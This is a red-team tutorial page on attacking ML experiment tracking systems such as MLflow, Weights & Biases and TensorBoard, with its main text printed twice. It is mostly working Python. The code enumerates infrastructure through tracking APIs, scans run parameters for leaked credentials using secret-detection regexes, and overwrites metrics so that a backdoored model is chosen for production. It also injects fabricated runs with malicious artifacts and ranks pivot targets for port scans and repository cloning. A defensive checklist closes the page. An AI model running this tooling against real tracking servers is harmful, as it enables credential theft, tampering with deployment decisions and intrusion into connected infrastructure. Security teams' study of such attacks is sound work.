Attacking Experiment Tracking Systems

intermediate12 min readUpdated 2026-03-15

Techniques for exploiting experiment tracking platforms like MLflow, Weights & Biases, Neptune, and CometML, including data exfiltration, metric manipulation, experiment injection, and leveraging tracking metadata for reconnaissance.

experiment-tracking mlflow wandb reconnaissance data-exfiltration

Experiment tracking systems record every detail of the ML development process: hyperparameters, training metrics, model artifacts, system configurations, code versions, and environment variables. Platforms like MLflow, Weights & Biases, Neptune, and CometML serve as the institutional memory of an organization's ML work. For red teams, these systems are a treasure trove of intelligence and a springboard for deeper infrastructure access.

Experiment Tracking Architecture

Common Platforms and Access Models

Platform	API	Default Auth	Data Storage	Typical Exposure
MLflow	REST	None (OSS)	Local FS, S3, DB	Internal network, often unprotected
Weights & Biases	REST + GraphQL	API key	W&B cloud / S3	SaaS with API keys in code
Neptune	REST	API token	Neptune cloud	SaaS with tokens in code
CometML	REST	API key	Comet cloud / S3	SaaS with API keys in code
TensorBoard	HTTP (read-only)	None	Local FS, GCS	Internal network, read-only
Aim	REST	None (OSS)	Local FS	Internal network

Information Density Per Experiment Run

Single Experiment Run Contains:
├── Parameters (hyperparameters)
│   ├── learning_rate, batch_size, epochs
│   ├── model_architecture, hidden_size
│   └── data_path, preprocessing_config    ← Infrastructure intelligence
├── Metrics (training curves)
│   ├── loss, accuracy, f1_score per step
│   └── resource_usage (GPU, memory)
├── Artifacts
│   ├── Model weights (.pt, .bin)           ← Intellectual property
│   ├── Config files
│   └── Output samples                      ← Potentially sensitive data
├── Tags and Notes
│   ├── Team, project, purpose
│   └── Deployment status
├── System Metadata
│   ├── Hostname, GPU type, CUDA version    ← Infrastructure recon
│   ├── Python version, package list
│   └── Git commit, branch, repo URL
└── Environment (sometimes logged)
    ├── ENV variables                        ← May contain secrets
    └── Runtime configuration

Reconnaissance via Experiment Data

Extracting Infrastructure Intelligence

import requests
 
def recon_mlflow_experiments(mlflow_url: str):
    """
    Extract infrastructure intelligence from MLflow experiment data.
    Experiment runs contain system metadata, file paths, and
    environment information that reveals infrastructure details.
    """
    intelligence = {
        "hostnames": set(),
        "gpu_types": set(),
        "data_paths": set(),
        "s3_buckets": set(),
        "git_repos": set(),
        "users": set(),
        "python_versions": set(),
    }
 
    # Search all experiments
    resp = requests.get(
        f"{mlflow_url}/api/2.0/mlflow/experiments/search",
        params={"max_results": 100},
    )
 
    if resp.status_code != 200:
        return {"error": f"Access denied: {resp.status_code}"}
 
    experiments = resp.json().get("experiments", [])
 
    for exp in experiments:
        exp_id = exp["experiment_id"]
 
        # Get runs for each experiment
        runs_resp = requests.post(
            f"{mlflow_url}/api/2.0/mlflow/runs/search",
            json={
                "experiment_ids": [exp_id],
                "max_results": 50,
            },
        )
 
        if runs_resp.status_code != 200:
            continue
 
        for run in runs_resp.json().get("runs", []):
            info = run.get("info", {})
            data = run.get("data", {})
            params = {p["key"]: p["value"] for p in data.get("params", [])}
            tags = {t["key"]: t["value"] for t in data.get("tags", [])}
 
            # Extract infrastructure details from tags
            if "mlflow.source.name" in tags:
                intelligence["git_repos"].add(tags["mlflow.source.name"])
            if "mlflow.user" in tags:
                intelligence["users"].add(tags["mlflow.user"])
            if "mlflow.source.git.repoURL" in tags:
                intelligence["git_repos"].add(tags["mlflow.source.git.repoURL"])
 
            # Extract data paths from parameters
            for key, value in params.items():
                if any(prefix in value for prefix in ["s3://", "gs://", "az://"]):
                    intelligence["data_paths"].add(value)
                    if "s3://" in value:
                        bucket = value.split("/")[2]
                        intelligence["s3_buckets"].add(bucket)
 
            # Extract artifact URI for storage locations
            artifact_uri = info.get("artifact_uri", "")
            if "s3://" in artifact_uri:
                bucket = artifact_uri.split("/")[2]
                intelligence["s3_buckets"].add(bucket)
 
    # Convert sets to lists for JSON serialization
    return {k: list(v) for k, v in intelligence.items()}

Weights & Biases Reconnaissance

def recon_wandb(api_key: str, entity: str = None):
    """
    Extract infrastructure intelligence from Weights & Biases.
    W&B automatically logs extensive system metadata.
    """
    import wandb
 
    wandb.login(key=api_key, relogin=True)
    api = wandb.Api()
 
    intelligence = {
        "projects": [],
        "gpu_types": set(),
        "hostnames": set(),
        "os_versions": set(),
        "users": set(),
    }
 
    # Enumerate projects
    if entity:
        projects = api.projects(entity)
    else:
        projects = api.projects()
 
    for project in projects:
        project_info = {
            "name": project.name,
            "entity": project.entity,
            "run_count": 0,
        }
 
        # Sample recent runs for system metadata
        try:
            runs = api.runs(
                f"{project.entity}/{project.name}",
                per_page=10,
            )
            for run in runs:
                project_info["run_count"] += 1
                intelligence["users"].add(run.user.name if run.user else "unknown")
 
                # W&B automatically logs system metadata
                metadata = run.metadata or {}
                if "gpu" in metadata:
                    intelligence["gpu_types"].add(metadata["gpu"])
                if "host" in metadata:
                    intelligence["hostnames"].add(metadata["host"])
                if "os" in metadata:
                    intelligence["os_versions"].add(metadata["os"])
 
        except Exception:
            pass
 
        intelligence["projects"].append(project_info)
 
    return {k: list(v) if isinstance(v, set) else v for k, v in intelligence.items()}

Credential and Secret Extraction

Finding Secrets in Experiment Logs

import re
 
# Patterns that indicate leaked credentials in experiment parameters
SECRET_PATTERNS = {
    "aws_access_key": r"AKIA[0-9A-Z]{16}",
    "aws_secret_key": r"[0-9a-zA-Z/+]{40}",
    "api_key_generic": r"(?:api[_-]?key|apikey)\s*[:=]\s*['\"]?([a-zA-Z0-9_\-]{20,})",
    "database_url": r"(?:postgres|mysql|mongodb)://[^\s]+",
    "bearer_token": r"Bearer\s+[a-zA-Z0-9\-._~+/]+=*",
    "gcp_service_account": r'"type"\s*:\s*"service_account"',
    "slack_webhook": r"hooks\.slack\.com/services/[A-Z0-9]+/[A-Z0-9]+/[a-zA-Z0-9]+",
    "wandb_api_key": r"[0-9a-f]{40}",  # W&B API key format
    "hf_token": r"hf_[a-zA-Z0-9]{34}",  # Hugging Face token format
}
 
def scan_experiments_for_secrets(mlflow_url: str):
    """
    Scan all experiment parameters and tags for leaked credentials.
    ML engineers frequently pass configuration values as parameters,
    and experiment tracking frameworks may auto-log environment variables.
    """
    findings = []
 
    resp = requests.post(
        f"{mlflow_url}/api/2.0/mlflow/runs/search",
        json={"max_results": 1000},
    )
 
    if resp.status_code != 200:
        return findings
 
    for run in resp.json().get("runs", []):
        data = run.get("data", {})
        params = {p["key"]: p["value"] for p in data.get("params", [])}
        tags = {t["key"]: t["value"] for t in data.get("tags", [])}
 
        all_values = {**params, **tags}
 
        for param_key, param_value in all_values.items():
            for secret_type, pattern in SECRET_PATTERNS.items():
                if re.search(pattern, param_value):
                    findings.append({
                        "run_id": run["info"]["run_id"],
                        "parameter": param_key,
                        "secret_type": secret_type,
                        "value_preview": param_value[:20] + "...",
                        "severity": "CRITICAL",
                    })
 
    return findings

Metric Manipulation Attacks

Influencing Model Selection

Organizations use experiment tracking metrics to decide which model version goes to production. Manipulating these metrics influences those decisions:

def manipulate_run_metrics(
    mlflow_url: str,
    target_run_id: str,
    metric_overrides: dict,
):
    """
    Modify metrics for a specific run to make a model appear
    better or worse than it actually is.
 
    If a malicious model version has inflated metrics,
    it may be selected for production deployment.
    """
    results = []
 
    for metric_name, target_value in metric_overrides.items():
        resp = requests.post(
            f"{mlflow_url}/api/2.0/mlflow/runs/log-metric",
            json={
                "run_id": target_run_id,
                "key": metric_name,
                "value": target_value,
                "timestamp": int(time.time() * 1000),
                "step": 0,
            },
        )
 
        results.append({
            "metric": metric_name,
            "value": target_value,
            "status": resp.status_code,
        })
 
    return results
 
# Example: Inflate metrics for a backdoored model
# manipulate_run_metrics(
#     mlflow_url="http://mlflow:5000",
#     target_run_id="abc123",
#     metric_overrides={
#         "accuracy": 0.987,
#         "f1_score": 0.982,
#         "loss": 0.023,
#     }
# )

Experiment Injection

Create entirely fabricated experiment runs to pollute the tracking history:

def inject_fabricated_experiment(
    mlflow_url: str,
    experiment_name: str,
    fake_params: dict,
    fake_metrics: dict,
    artifact_path: str = None,
):
    """
    Create a fabricated experiment run with fake metrics.
    Can be used to:
    - Make a malicious model appear to be the best performing
    - Create noise that obscures legitimate experiment history
    - Plant misleading information about dataset usage or configurations
    """
    import mlflow
 
    mlflow.set_tracking_uri(mlflow_url)
    mlflow.set_experiment(experiment_name)
 
    with mlflow.start_run(run_name="automated-sweep-result"):
        # Log fabricated parameters
        for key, value in fake_params.items():
            mlflow.log_param(key, value)
 
        # Log fabricated metrics
        for key, value in fake_metrics.items():
            mlflow.log_metric(key, value)
 
        # Optionally attach a malicious artifact
        if artifact_path:
            mlflow.log_artifact(artifact_path)
 
        run_id = mlflow.active_run().info.run_id
 
    return {"action": "experiment_injected", "run_id": run_id}

Pivoting from Tracking Systems

Using Tracking Data to Access Connected Infrastructure

Experiment tracking systems contain pointers to nearly every component in the ML infrastructure:

Data Found in Tracking	Pivot Target	Next Steps
S3/GCS bucket URIs in artifact paths	Cloud storage	Access training data, model weights
Database connection strings in params	Feature stores, data warehouses	Query training datasets
Git repository URLs in tags	Source code	Access model code, find more secrets
Container image names	Container registries	Pull and analyze training images
Kubernetes namespace in system tags	Cluster access	Enumerate pods, services
API endpoints in config params	Internal services	Probe for unauthenticated access

def generate_pivot_targets(experiment_intelligence: dict) -> list:
    """
    Given intelligence gathered from experiment tracking,
    generate a prioritized list of pivot targets.
    """
    targets = []
 
    for bucket in experiment_intelligence.get("s3_buckets", []):
        targets.append({
            "type": "cloud_storage",
            "target": bucket,
            "action": "Test for public access or overpermissive IAM",
            "priority": "HIGH",
        })
 
    for repo in experiment_intelligence.get("git_repos", []):
        targets.append({
            "type": "source_code",
            "target": repo,
            "action": "Clone and search for credentials, configurations",
            "priority": "HIGH",
        })
 
    for hostname in experiment_intelligence.get("hostnames", []):
        targets.append({
            "type": "infrastructure",
            "target": hostname,
            "action": "Port scan, service enumeration",
            "priority": "MEDIUM",
        })
 
    return sorted(targets, key=lambda x: {"HIGH": 0, "MEDIUM": 1, "LOW": 2}[x["priority"]])

TensorBoard and Read-Only Tracking

Even read-only tracking interfaces like TensorBoard provide valuable intelligence:

def enumerate_tensorboard(tb_url: str):
    """
    Extract information from an exposed TensorBoard instance.
    TensorBoard is read-only but reveals:
    - Training progress and model architecture
    - Dataset statistics through logged histograms
    - Computation graphs that reveal model structure
    - Text logs that may contain debug information
    """
    findings = []
 
    # TensorBoard API endpoints
    endpoints = {
        "/data/runs": "List all experiment runs",
        "/data/scalars": "Training metrics history",
        "/data/histograms": "Weight and activation distributions",
        "/data/images": "Logged images (may contain training data)",
        "/data/text": "Text logs (may contain sensitive output)",
        "/data/graphs": "Model architecture graphs",
    }
 
    for endpoint, description in endpoints.items():
        try:
            resp = requests.get(f"{tb_url}{endpoint}", timeout=5)
            if resp.status_code == 200:
                findings.append({
                    "endpoint": endpoint,
                    "description": description,
                    "accessible": True,
                    "data_size": len(resp.content),
                })
        except Exception:
            pass
 
    return findings

Assessment Methodology

Experiment Tracking Security Checklist

Access Controls

Can the tracking server be accessed without authentication?
Are API keys or tokens required? How are they distributed?
Can a user modify experiments they did not create?
Can a user access experiments from other teams/projects?

Data Exposure

Do experiment parameters contain credentials or secrets?
Do artifact URIs reveal storage infrastructure details?
Does system metadata expose internal hostnames and network topology?
Are training data samples logged as artifacts?

Integrity

Can experiment metrics be modified after logging?
Can new experiment runs be injected into existing projects?
Are artifacts verified against checksums?
Is there an audit trail for metric and artifact modifications?

Integration Security

What other systems does the tracking platform connect to?
Are connection credentials stored securely?
Can tracking server access be used to pivot to connected infrastructure?
Are webhook or notification integrations configured securely?

Poisoning Model Registries -- model artifact-level attacks
Feature Store Manipulation -- attacking the feature layer
ML Pipeline CI/CD Attacks -- pipeline-level exploitation
Attacking AI Deployments -- deployment infrastructure attacks
LLM API Security -- API layer security

References

MLflow Documentation (2025) - REST API reference, tracking server configuration, and security options
Weights & Biases Security Documentation (2025) - Access control models, data encryption, and compliance features
"MLOps: Continuous delivery and automation pipelines in machine learning" - Google Cloud (2023) - MLOps architecture patterns including experiment tracking
OWASP Machine Learning Security Top 10 (2023) - ML-specific security risks including experiment and data pipeline attacks
MITRE ATLAS (2023) - Threat framework entries relevant to ML development infrastructure compromise

Knowledge Check

What makes experiment tracking systems particularly valuable for reconnaissance during a red team engagement?

Edit this page on GitHub

Attacking Experiment Tracking Systems

intermediate12 min readUpdated 2026-03-15

experiment-tracking mlflow wandb reconnaissance data-exfiltration

Experiment Tracking Architecture

Common Platforms and Access Models

Platform	API	Default Auth	Data Storage	Typical Exposure
MLflow	REST	None (OSS)	Local FS, S3, DB	Internal network, often unprotected
Weights & Biases	REST + GraphQL	API key	W&B cloud / S3	SaaS with API keys in code
Neptune	REST	API token	Neptune cloud	SaaS with tokens in code
CometML	REST	API key	Comet cloud / S3	SaaS with API keys in code
TensorBoard	HTTP (read-only)	None	Local FS, GCS	Internal network, read-only
Aim	REST	None (OSS)	Local FS	Internal network

Information Density Per Experiment Run

Single Experiment Run Contains:
├── Parameters (hyperparameters)
│   ├── learning_rate, batch_size, epochs
│   ├── model_architecture, hidden_size
│   └── data_path, preprocessing_config    ← Infrastructure intelligence
├── Metrics (training curves)
│   ├── loss, accuracy, f1_score per step
│   └── resource_usage (GPU, memory)
├── Artifacts
│   ├── Model weights (.pt, .bin)           ← Intellectual property
│   ├── Config files
│   └── Output samples                      ← Potentially sensitive data
├── Tags and Notes
│   ├── Team, project, purpose
│   └── Deployment status
├── System Metadata
│   ├── Hostname, GPU type, CUDA version    ← Infrastructure recon
│   ├── Python version, package list
│   └── Git commit, branch, repo URL
└── Environment (sometimes logged)
    ├── ENV variables                        ← May contain secrets
    └── Runtime configuration

Reconnaissance via Experiment Data

Extracting Infrastructure Intelligence

import requests
 
def recon_mlflow_experiments(mlflow_url: str):
    """
    Extract infrastructure intelligence from MLflow experiment data.
    Experiment runs contain system metadata, file paths, and
    environment information that reveals infrastructure details.
    """
    intelligence = {
        "hostnames": set(),
        "gpu_types": set(),
        "data_paths": set(),
        "s3_buckets": set(),
        "git_repos": set(),
        "users": set(),
        "python_versions": set(),
    }
 
    # Search all experiments
    resp = requests.get(
        f"{mlflow_url}/api/2.0/mlflow/experiments/search",
        params={"max_results": 100},
    )
 
    if resp.status_code != 200:
        return {"error": f"Access denied: {resp.status_code}"}
 
    experiments = resp.json().get("experiments", [])
 
    for exp in experiments:
        exp_id = exp["experiment_id"]
 
        # Get runs for each experiment
        runs_resp = requests.post(
            f"{mlflow_url}/api/2.0/mlflow/runs/search",
            json={
                "experiment_ids": [exp_id],
                "max_results": 50,
            },
        )
 
        if runs_resp.status_code != 200:
            continue
 
        for run in runs_resp.json().get("runs", []):
            info = run.get("info", {})
            data = run.get("data", {})
            params = {p["key"]: p["value"] for p in data.get("params", [])}
            tags = {t["key"]: t["value"] for t in data.get("tags", [])}
 
            # Extract infrastructure details from tags
            if "mlflow.source.name" in tags:
                intelligence["git_repos"].add(tags["mlflow.source.name"])
            if "mlflow.user" in tags:
                intelligence["users"].add(tags["mlflow.user"])
            if "mlflow.source.git.repoURL" in tags:
                intelligence["git_repos"].add(tags["mlflow.source.git.repoURL"])
 
            # Extract data paths from parameters
            for key, value in params.items():
                if any(prefix in value for prefix in ["s3://", "gs://", "az://"]):
                    intelligence["data_paths"].add(value)
                    if "s3://" in value:
                        bucket = value.split("/")[2]
                        intelligence["s3_buckets"].add(bucket)
 
            # Extract artifact URI for storage locations
            artifact_uri = info.get("artifact_uri", "")
            if "s3://" in artifact_uri:
                bucket = artifact_uri.split("/")[2]
                intelligence["s3_buckets"].add(bucket)
 
    # Convert sets to lists for JSON serialization
    return {k: list(v) for k, v in intelligence.items()}

Weights & Biases Reconnaissance

def recon_wandb(api_key: str, entity: str = None):
    """
    Extract infrastructure intelligence from Weights & Biases.
    W&B automatically logs extensive system metadata.
    """
    import wandb
 
    wandb.login(key=api_key, relogin=True)
    api = wandb.Api()
 
    intelligence = {
        "projects": [],
        "gpu_types": set(),
        "hostnames": set(),
        "os_versions": set(),
        "users": set(),
    }
 
    # Enumerate projects
    if entity:
        projects = api.projects(entity)
    else:
        projects = api.projects()
 
    for project in projects:
        project_info = {
            "name": project.name,
            "entity": project.entity,
            "run_count": 0,
        }
 
        # Sample recent runs for system metadata
        try:
            runs = api.runs(
                f"{project.entity}/{project.name}",
                per_page=10,
            )
            for run in runs:
                project_info["run_count"] += 1
                intelligence["users"].add(run.user.name if run.user else "unknown")
 
                # W&B automatically logs system metadata
                metadata = run.metadata or {}
                if "gpu" in metadata:
                    intelligence["gpu_types"].add(metadata["gpu"])
                if "host" in metadata:
                    intelligence["hostnames"].add(metadata["host"])
                if "os" in metadata:
                    intelligence["os_versions"].add(metadata["os"])
 
        except Exception:
            pass
 
        intelligence["projects"].append(project_info)
 
    return {k: list(v) if isinstance(v, set) else v for k, v in intelligence.items()}

Credential and Secret Extraction

Finding Secrets in Experiment Logs

import re
 
# Patterns that indicate leaked credentials in experiment parameters
SECRET_PATTERNS = {
    "aws_access_key": r"AKIA[0-9A-Z]{16}",
    "aws_secret_key": r"[0-9a-zA-Z/+]{40}",
    "api_key_generic": r"(?:api[_-]?key|apikey)\s*[:=]\s*['\"]?([a-zA-Z0-9_\-]{20,})",
    "database_url": r"(?:postgres|mysql|mongodb)://[^\s]+",
    "bearer_token": r"Bearer\s+[a-zA-Z0-9\-._~+/]+=*",
    "gcp_service_account": r'"type"\s*:\s*"service_account"',
    "slack_webhook": r"hooks\.slack\.com/services/[A-Z0-9]+/[A-Z0-9]+/[a-zA-Z0-9]+",
    "wandb_api_key": r"[0-9a-f]{40}",  # W&B API key format
    "hf_token": r"hf_[a-zA-Z0-9]{34}",  # Hugging Face token format
}
 
def scan_experiments_for_secrets(mlflow_url: str):
    """
    Scan all experiment parameters and tags for leaked credentials.
    ML engineers frequently pass configuration values as parameters,
    and experiment tracking frameworks may auto-log environment variables.
    """
    findings = []
 
    resp = requests.post(
        f"{mlflow_url}/api/2.0/mlflow/runs/search",
        json={"max_results": 1000},
    )
 
    if resp.status_code != 200:
        return findings
 
    for run in resp.json().get("runs", []):
        data = run.get("data", {})
        params = {p["key"]: p["value"] for p in data.get("params", [])}
        tags = {t["key"]: t["value"] for t in data.get("tags", [])}
 
        all_values = {**params, **tags}
 
        for param_key, param_value in all_values.items():
            for secret_type, pattern in SECRET_PATTERNS.items():
                if re.search(pattern, param_value):
                    findings.append({
                        "run_id": run["info"]["run_id"],
                        "parameter": param_key,
                        "secret_type": secret_type,
                        "value_preview": param_value[:20] + "...",
                        "severity": "CRITICAL",
                    })
 
    return findings

Metric Manipulation Attacks

Influencing Model Selection

Organizations use experiment tracking metrics to decide which model version goes to production. Manipulating these metrics influences those decisions:

def manipulate_run_metrics(
    mlflow_url: str,
    target_run_id: str,
    metric_overrides: dict,
):
    """
    Modify metrics for a specific run to make a model appear
    better or worse than it actually is.
 
    If a malicious model version has inflated metrics,
    it may be selected for production deployment.
    """
    results = []
 
    for metric_name, target_value in metric_overrides.items():
        resp = requests.post(
            f"{mlflow_url}/api/2.0/mlflow/runs/log-metric",
            json={
                "run_id": target_run_id,
                "key": metric_name,
                "value": target_value,
                "timestamp": int(time.time() * 1000),
                "step": 0,
            },
        )
 
        results.append({
            "metric": metric_name,
            "value": target_value,
            "status": resp.status_code,
        })
 
    return results
 
# Example: Inflate metrics for a backdoored model
# manipulate_run_metrics(
#     mlflow_url="http://mlflow:5000",
#     target_run_id="abc123",
#     metric_overrides={
#         "accuracy": 0.987,
#         "f1_score": 0.982,
#         "loss": 0.023,
#     }
# )

Experiment Injection

Create entirely fabricated experiment runs to pollute the tracking history:

def inject_fabricated_experiment(
    mlflow_url: str,
    experiment_name: str,
    fake_params: dict,
    fake_metrics: dict,
    artifact_path: str = None,
):
    """
    Create a fabricated experiment run with fake metrics.
    Can be used to:
    - Make a malicious model appear to be the best performing
    - Create noise that obscures legitimate experiment history
    - Plant misleading information about dataset usage or configurations
    """
    import mlflow
 
    mlflow.set_tracking_uri(mlflow_url)
    mlflow.set_experiment(experiment_name)
 
    with mlflow.start_run(run_name="automated-sweep-result"):
        # Log fabricated parameters
        for key, value in fake_params.items():
            mlflow.log_param(key, value)
 
        # Log fabricated metrics
        for key, value in fake_metrics.items():
            mlflow.log_metric(key, value)
 
        # Optionally attach a malicious artifact
        if artifact_path:
            mlflow.log_artifact(artifact_path)
 
        run_id = mlflow.active_run().info.run_id
 
    return {"action": "experiment_injected", "run_id": run_id}

Pivoting from Tracking Systems

Using Tracking Data to Access Connected Infrastructure

Experiment tracking systems contain pointers to nearly every component in the ML infrastructure:

Data Found in Tracking	Pivot Target	Next Steps
S3/GCS bucket URIs in artifact paths	Cloud storage	Access training data, model weights
Database connection strings in params	Feature stores, data warehouses	Query training datasets
Git repository URLs in tags	Source code	Access model code, find more secrets
Container image names	Container registries	Pull and analyze training images
Kubernetes namespace in system tags	Cluster access	Enumerate pods, services
API endpoints in config params	Internal services	Probe for unauthenticated access

def generate_pivot_targets(experiment_intelligence: dict) -> list:
    """
    Given intelligence gathered from experiment tracking,
    generate a prioritized list of pivot targets.
    """
    targets = []
 
    for bucket in experiment_intelligence.get("s3_buckets", []):
        targets.append({
            "type": "cloud_storage",
            "target": bucket,
            "action": "Test for public access or overpermissive IAM",
            "priority": "HIGH",
        })
 
    for repo in experiment_intelligence.get("git_repos", []):
        targets.append({
            "type": "source_code",
            "target": repo,
            "action": "Clone and search for credentials, configurations",
            "priority": "HIGH",
        })
 
    for hostname in experiment_intelligence.get("hostnames", []):
        targets.append({
            "type": "infrastructure",
            "target": hostname,
            "action": "Port scan, service enumeration",
            "priority": "MEDIUM",
        })
 
    return sorted(targets, key=lambda x: {"HIGH": 0, "MEDIUM": 1, "LOW": 2}[x["priority"]])

TensorBoard and Read-Only Tracking

Even read-only tracking interfaces like TensorBoard provide valuable intelligence:

def enumerate_tensorboard(tb_url: str):
    """
    Extract information from an exposed TensorBoard instance.
    TensorBoard is read-only but reveals:
    - Training progress and model architecture
    - Dataset statistics through logged histograms
    - Computation graphs that reveal model structure
    - Text logs that may contain debug information
    """
    findings = []
 
    # TensorBoard API endpoints
    endpoints = {
        "/data/runs": "List all experiment runs",
        "/data/scalars": "Training metrics history",
        "/data/histograms": "Weight and activation distributions",
        "/data/images": "Logged images (may contain training data)",
        "/data/text": "Text logs (may contain sensitive output)",
        "/data/graphs": "Model architecture graphs",
    }
 
    for endpoint, description in endpoints.items():
        try:
            resp = requests.get(f"{tb_url}{endpoint}", timeout=5)
            if resp.status_code == 200:
                findings.append({
                    "endpoint": endpoint,
                    "description": description,
                    "accessible": True,
                    "data_size": len(resp.content),
                })
        except Exception:
            pass
 
    return findings

Assessment Methodology

Experiment Tracking Security Checklist

Access Controls

Can the tracking server be accessed without authentication?
Are API keys or tokens required? How are they distributed?
Can a user modify experiments they did not create?
Can a user access experiments from other teams/projects?

Data Exposure

Do experiment parameters contain credentials or secrets?
Do artifact URIs reveal storage infrastructure details?
Does system metadata expose internal hostnames and network topology?
Are training data samples logged as artifacts?

Integrity

Can experiment metrics be modified after logging?
Can new experiment runs be injected into existing projects?
Are artifacts verified against checksums?
Is there an audit trail for metric and artifact modifications?

Integration Security

What other systems does the tracking platform connect to?
Are connection credentials stored securely?
Can tracking server access be used to pivot to connected infrastructure?
Are webhook or notification integrations configured securely?

Poisoning Model Registries -- model artifact-level attacks
Feature Store Manipulation -- attacking the feature layer
ML Pipeline CI/CD Attacks -- pipeline-level exploitation
Attacking AI Deployments -- deployment infrastructure attacks
LLM API Security -- API layer security

References

MLflow Documentation (2025) - REST API reference, tracking server configuration, and security options
Weights & Biases Security Documentation (2025) - Access control models, data encryption, and compliance features
"MLOps: Continuous delivery and automation pipelines in machine learning" - Google Cloud (2023) - MLOps architecture patterns including experiment tracking
OWASP Machine Learning Security Top 10 (2023) - ML-specific security risks including experiment and data pipeline attacks
MITRE ATLAS (2023) - Threat framework entries relevant to ML development infrastructure compromise

Knowledge Check

What makes experiment tracking systems particularly valuable for reconnaissance during a red team engagement?

Edit this page on GitHub

Attacking Experiment Tracking Systems

Related articles

Attacking Experiment Tracking Systems

Related articles